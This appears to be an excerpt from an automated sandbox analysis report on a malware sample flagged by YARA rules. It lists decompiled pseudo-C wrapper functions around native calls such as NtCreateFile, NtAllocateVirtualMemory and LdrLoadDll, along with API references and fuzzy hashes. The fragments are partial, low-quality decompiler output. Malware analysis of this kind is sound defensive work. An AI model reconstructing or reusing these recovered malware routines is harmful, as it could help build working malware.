                                                                                        • Instruction Fuzzy Hash: 59F0F4B2200108AFCB04CF99CC81EEB77A9EF8C314F168649BA0DA7241D634E8518BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 21%
                                                                                        			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                        				void* _t18;
                                                                                        				void* _t27;
                                                                                        				void* _t28;
                                                                                        				intOrPtr* _t29;
                                                                                        
                                                                                        				asm("in al, dx");
                                                                                        				_t13 = _a4;
                                                                                        				_t29 = _a4 + 0xc48;
                                                                                        				E0041A960(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                        				_t6 =  &_a32; // 0x414d42
                                                                                        				_t12 =  &_a8; // 0x414d42
                                                                                        				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                                                                        				return _t18;
                                                                                        			}








                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: BMA$BMA
                                                                                        • API String ID: 2738559852-2163208940
                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040ACD0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                        				char* _v8;
                                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                                        				char _v536;
                                                                                        				void* _t15;
                                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                                        				void* _t31;
                                                                                        				void* _t32;
                                                                                        				void* _t33;
                                                                                        
                                                                                        				_v8 =  &_v536;
                                                                                        				_t15 = E0041C650( &_v12, 0x104, _a8);
                                                                                        				_t32 = _t31 + 0xc;
                                                                                        				if(_t15 != 0) {
                                                                                        					_t17 = E0041CA70(__eflags, _v8);
                                                                                        					_t33 = _t32 + 4;
                                                                                        					__eflags = _t17;
                                                                                        					if(_t17 != 0) {
                                                                                        						E0041CCF0(__ebx,  &_v12, 0);
                                                                                        						_t33 = _t33 + 8;
                                                                                        					}
                                                                                        					_t18 = E0041AEA0(_v8);
                                                                                        					_v16 = _t18;
                                                                                        					__eflags = _t18;
                                                                                        					if(_t18 == 0) {
                                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                        						return _v16;
                                                                                        					}
                                                                                        					return _t18;
                                                                                        				} else {
                                                                                        					return _t15;
                                                                                        				}
                                                                                        			}














                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                        • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                        • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: ed3890e6c2eee5cfa791458169c80ce269c18676380613ddf59191260504aa03
                                                                                        • Instruction ID: 58357fb814e1e4387aeab9ebf93d5a073099e80174bff116cacca3e8f16ab292
                                                                                        • Opcode Fuzzy Hash: ed3890e6c2eee5cfa791458169c80ce269c18676380613ddf59191260504aa03
                                                                                        • Instruction Fuzzy Hash: 5A0181B5200208AFCB10DF99DC81DEB77A9EF88314F15855AFD4C97242C234E9618BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 64%
                                                                                        			E00419D5A(void* __eax, void* __ecx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                        				long _t25;
                                                                                        				void* _t37;
                                                                                        
                                                                                        				_pop(_t41);
                                                                                        				_push(cs);
                                                                                        				_t19 = _a4;
                                                                                        				_t4 = _t19 + 0xc40; // 0xc40
                                                                                        				E0041A960(_t37, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                        				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                        				return _t25;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: f15d63ada20e0f20ceec27c84b0ed4a84692169150ddc62e2d63ddd8ca885570
                                                                                        • Instruction ID: 7a889a84d11053dc69158f2f0a2d7f67351ec2de8c74b34ac5053da27a58845f
                                                                                        • Opcode Fuzzy Hash: f15d63ada20e0f20ceec27c84b0ed4a84692169150ddc62e2d63ddd8ca885570
                                                                                        • Instruction Fuzzy Hash: 7101B2B2245108AFDB08CF89DC85EEB77A9EF8C754F158249FA0DD7241D630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                        				long _t21;
                                                                                        				void* _t31;
                                                                                        
                                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                                        				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                        				return _t21;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E00419F3C(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                        				long _t16;
                                                                                        				void* _t23;
                                                                                        
                                                                                        				asm("repne or [ebp-0x75], edx");
                                                                                        				_t12 = _a4;
                                                                                        				_t3 = _t12 + 0xc60; // 0xca0
                                                                                        				E0041A960(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                        				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                        				return _t16;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                        				long _t14;
                                                                                        				void* _t21;
                                                                                        
                                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                                        				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                        				return _t14;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00419E90(intOrPtr _a4, void* _a8) {
                                                                                        				long _t8;
                                                                                        				void* _t11;
                                                                                        
                                                                                        				_t5 = _a4;
                                                                                        				_t2 = _t5 + 0x10; // 0x300
                                                                                        				_t3 = _t5 + 0xc50; // 0x40a923
                                                                                        				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                        				_t8 = NtClose(_a8); // executed
                                                                                        				return _t8;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                        • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                                                                        • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                        • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                        • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                                                                        • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                        • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                        • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                                                                        • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                        • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                        • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                                        • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                        • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 2488874121-0
                                                                                        • Opcode ID: 0965005e2dce452d871df99e987b56b8226210ad74e858144096c5632e472370
                                                                                        • Instruction ID: 7177ada076c19e5f12ac84e6d69a36771d883204be9dbad6a8e9e42b3957b6f7
                                                                                        • Opcode Fuzzy Hash: 0965005e2dce452d871df99e987b56b8226210ad74e858144096c5632e472370
                                                                                        • Instruction Fuzzy Hash: A0018FB12012046FCB14EF65DC84DE77769EF88760F018949F85C5B242C535E9648BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 19%
                                                                                        			E0041A063(void* __eflags, intOrPtr _a8, int _a12, long _a16, void* _a20) {
                                                                                        				char _t18;
                                                                                        				void* _t22;
                                                                                        				void* _t26;
                                                                                        				void* _t27;
                                                                                        
                                                                                        				_pop(es);
                                                                                        				if(__eflags >= 0) {
                                                                                        					_t7 = _t27 + 0x6a;
                                                                                        					 *_t7 =  *((intOrPtr*)(_t27 + 0x6a)) + _t22;
                                                                                        					__eflags =  *_t7;
                                                                                        					_push(0);
                                                                                        					_push(0xd69);
                                                                                        					_push(0xed);
                                                                                        					E0041A960(_t26);
                                                                                        					ExitProcess(_a12);
                                                                                        				}
                                                                                        				asm("in eax, 0xc1");
                                                                                        				 *0xce443b12 = 0xed;
                                                                                        				_t15 = _a8;
                                                                                        				_push(_t27);
                                                                                        				_t3 = _t15 + 0xc74; // 0xc74
                                                                                        				E0041A960(_t26, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
                                                                                        				_t18 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                                                                        				return _t18;
                                                                                        			}








                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitFreeHeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1180424539-0
                                                                                        • Opcode ID: 5e938ab661c113d8d7853c366110992ac1d380ba0c46417e929e3cb690f62961
                                                                                        • Instruction ID: c74340f0f204f7c4ddb17853360d15653bd2035839ab73c73f339d95e20bd8ed
                                                                                        • Opcode Fuzzy Hash: 5e938ab661c113d8d7853c366110992ac1d380ba0c46417e929e3cb690f62961
                                                                                        • Instruction Fuzzy Hash: A8F0AFB52152046FC710DF65DC85ED73B68AF48710F058949F9986B242C530EA54CBF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 21%
                                                                                        			E004082E9(void* __eax, signed int __ebx, signed int __edx, void* __esi, long _a12) {
                                                                                        				intOrPtr _v0;
                                                                                        				char _v71;
                                                                                        				char _v72;
                                                                                        				void* _t16;
                                                                                        				int _t17;
                                                                                        				long _t29;
                                                                                        				int _t32;
                                                                                        				void* _t34;
                                                                                        				void* _t36;
                                                                                        				void* _t37;
                                                                                        
                                                                                        				_t31 = __esi;
                                                                                        				_t16 = __eax + 1;
                                                                                        				if(_t16 < 0) {
                                                                                        					_t34 = __esi - 1;
                                                                                        					 *(_t36 + __edx * 2 - 0x137c1375) =  *(_t36 + __edx * 2 - 0x137c1375) & __ebx;
                                                                                        					_push(_t36);
                                                                                        					_t36 = _t37;
                                                                                        					_t37 = _t37 - 0x40;
                                                                                        					_push(_t34);
                                                                                        					_v72 = 0;
                                                                                        					E0041B860( &_v71, 0, 0x3f);
                                                                                        					E0041C400( &_v72, 3);
                                                                                        					_t31 = _v0 + 0x1c;
                                                                                        					_t16 = E0040ACD0(__ebx, _t31, _t31,  &_v72); // executed
                                                                                        					_push(0xc4e7b6d6);
                                                                                        				}
                                                                                        				_push(0);
                                                                                        				_push(0);
                                                                                        				_push(_t16);
                                                                                        				_push(_t31);
                                                                                        				_t17 = E00414E20();
                                                                                        				_t32 = _t17;
                                                                                        				if(_t32 != 0) {
                                                                                        					_t29 = _a12;
                                                                                        					_t17 = PostThreadMessageW(_t29, 0x111, 0, 0); // executed
                                                                                        					_t45 = _t17;
                                                                                        					if(_t17 == 0) {
                                                                                        						_t17 =  *_t32(_t29, 0x8003, _t36 + (E0040A460(_t45, 1, 8) & 0x000000ff) - 0x40, _t17);
                                                                                        					}
                                                                                        				}
                                                                                        				return _t17;
                                                                                        			}














                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 32b5f2ab0ce1d72a80887b25adf5504f3b8a637ad157bef46505e07604a851b4
                                                                                        • Instruction ID: 34bbe34b11dd5259c0ca39b76f369e21f56f034487a877647d8497b709729909
                                                                                        • Opcode Fuzzy Hash: 32b5f2ab0ce1d72a80887b25adf5504f3b8a637ad157bef46505e07604a851b4
                                                                                        • Instruction Fuzzy Hash: FA012831A802287AE720A6959C02FFF371CAB40F14F04406EFF44BA1C1E6B8290647F9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 21%
                                                                                        			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                        				char _v67;
                                                                                        				char _v68;
                                                                                        				void* _t12;
                                                                                        				intOrPtr* _t13;
                                                                                        				int _t14;
                                                                                        				long _t22;
                                                                                        				void* _t25;
                                                                                        				intOrPtr* _t26;
                                                                                        				void* _t27;
                                                                                        
                                                                                        				_v68 = 0;
                                                                                        				E0041B860( &_v67, 0, 0x3f);
                                                                                        				E0041C400( &_v68, 3);
                                                                                        				_t25 = _a4 + 0x1c;
                                                                                        				_t12 = E0040ACD0(__ebx, _t25, _t25,  &_v68); // executed
                                                                                        				_push(0xc4e7b6d6);
                                                                                        				_push(0);
                                                                                        				_push(0);
                                                                                        				_push(_t12);
                                                                                        				_push(_t25);
                                                                                        				_t13 = E00414E20();
                                                                                        				_t26 = _t13;
                                                                                        				if(_t26 != 0) {
                                                                                        					_t22 = _a8;
                                                                                        					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                                                        					_t34 = _t14;
                                                                                        					if(_t14 == 0) {
                                                                                        						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t34, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                        					}
                                                                                        					return _t14;
                                                                                        				}
                                                                                        				return _t13;
                                                                                        			}













                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 29%
                                                                                        			E00419FF6(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16, long _a20) {
                                                                                        				intOrPtr* _t10;
                                                                                        				void* _t12;
                                                                                        				void* _t25;
                                                                                        				void* _t26;
                                                                                        				intOrPtr* _t28;
                                                                                        				void* _t30;
                                                                                        
                                                                                        				asm("cdq");
                                                                                        				asm("invalid");
                                                                                        				_t10 = __eax - 1;
                                                                                        				asm("in eax, dx");
                                                                                        				if(_t10 != 0) {
                                                                                        					 *_t10 =  *_t10 + _t10;
                                                                                        					_t12 = RtlAllocateHeap(_a12, _a16, _a20); // executed
                                                                                        					return _t12;
                                                                                        				} else {
                                                                                        					_t13 = _a4;
                                                                                        					_t3 = _t13 + 0xc6c; // 0xc6e
                                                                                        					_t28 = _t3;
                                                                                        					E0041A960(_t25, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x33);
                                                                                        					return  *((intOrPtr*)( *_t28))(_a8, _a12, _t26, _t30);
                                                                                        				}
                                                                                        			}










                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                        				char _t10;
                                                                                        				void* _t15;
                                                                                        
                                                                                        				_t3 = _a4 + 0xc74; // 0xc74
                                                                                        				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                        				return _t10;
                                                                                        			}






                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E0041A1CD(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                        				int _t10;
                                                                                        				void* _t15;
                                                                                        
                                                                                        				asm("adc al, [esi]");
                                                                                        				_t7 = _a4;
                                                                                        				_push(0x8bec8b55);
                                                                                        				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                        				return _t10;
                                                                                        			}






                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                        				int _t10;
                                                                                        				void* _t15;
                                                                                        
                                                                                        				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                        				return _t10;
                                                                                        			}






                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                                        Memory Dump Source
